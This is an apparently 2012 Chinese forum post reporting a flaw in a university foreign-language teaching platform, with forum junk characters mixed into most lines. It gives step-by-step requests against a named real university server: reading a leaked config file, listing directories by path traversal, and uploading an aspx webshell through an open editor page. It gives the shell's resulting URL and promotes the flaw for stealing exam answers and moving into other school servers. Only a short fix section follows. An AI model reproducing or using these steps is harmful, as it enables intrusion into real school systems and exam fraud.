找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2218|回复: 0
打印 上一主题 下一主题

新理念外语网络教学平台文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:10:29 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
0 ~% V" h- g2 g1 [" P& I# M0 j3 W; W- R% t& y& v
详细说明:
6 x% `! ?# C! X; o. J 9 v- c( s# V7 q
以南开大学的为例:
  t7 g) w8 A& |% Phttp://222.30.60.3/NPELS! T8 v1 D& u$ v
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址- y/ \2 {$ N2 p1 X/ g; h
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
1 v$ f* x3 }+ E  O2 z( i<value>http://222.30.60.3/NPELS/CommonService.asmx</value>2 w! u4 c/ k: Q0 U# s1 d5 }7 m
</setting>* W1 W6 }- r1 V( j
及版本号
* A' }6 t2 f, M# D# j' G<add key="TVersion" value="1, 0, 0, 2187">
' k) M4 C+ W- o& @% g</add>
6 ]' x# v, p6 U* X" F直接访问
3 e: @9 P! a- Chttp://222.30.60.3/NPELS/CommonService.asmx, Z7 a& o3 h: Z, J
使用GetTestClientFileList操作,直接 HTTP GET 列目录:
( h# r9 O* B. ^http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187  `1 z7 Y' m4 I9 Z- @% d' h1 Z2 z
进一步列目录(返回的网页很大,可以直接 wget 下来)9 T4 g9 `: g( n2 G+ ~
http://222.30.60.3/NPELS/CommonS ... List?version=../../
4 x+ m6 o# }) j( g 8 Q. U$ w# n, ^; K3 @7 ]) M% W
发现$ V4 y4 e- ?1 |6 B$ X& \# H6 t, {/ k
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
; n7 \) o8 d% \: o可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头9 `9 g9 f9 X3 B: Z1 s- x
上传后继续列目录找到木马地址直接访问即可
+ z3 ]! |, V  {0 V: Q( k, h : G: `" }) i1 ]) F! F
OOXX
; f/ ~) S3 o: [# L' m . V, M6 P( Y6 x& \; t2 P
Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法
6 B5 d5 x- e% m0 g- D3 k: B3 M漏洞证明:0 [- W$ P2 K5 F* o

+ C6 A: D  a5 x7 I, p) k% N, U/ f& D) }+ E) }列目录:- H9 r' ?- Q2 z+ Q; V
http://222.30.60.3/NPELS/CommonS ... List?version=../../
4 r  o8 [9 m  j! ?9 p文件上传:
$ i/ y# J  `9 j6 _" c9 Ehttp://222.30.60.3/npelsv/editor/editor.htm: V! v, r  D% ]8 a4 g/ L) M7 `
3 l/ ]/ F  h/ W. q+ Z
上传木马:
; {" ]" ?( |' J1 S6 Khttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx# ~8 t: _9 g8 [$ j6 h: z

1 h6 w- r5 q# k* V3 `( _) ~* Y修复方案:# |8 m( h" {$ s9 }
好像考试系统必须使用 CommonService.asmx
4 r5 {! k' \9 ?% m+ R8 u3 |! u最好配置文件加密或者用别的方式不让它泄露出来" G: q7 j) c3 m/ L
并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样​
! {8 J$ ~7 c* ^% n
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表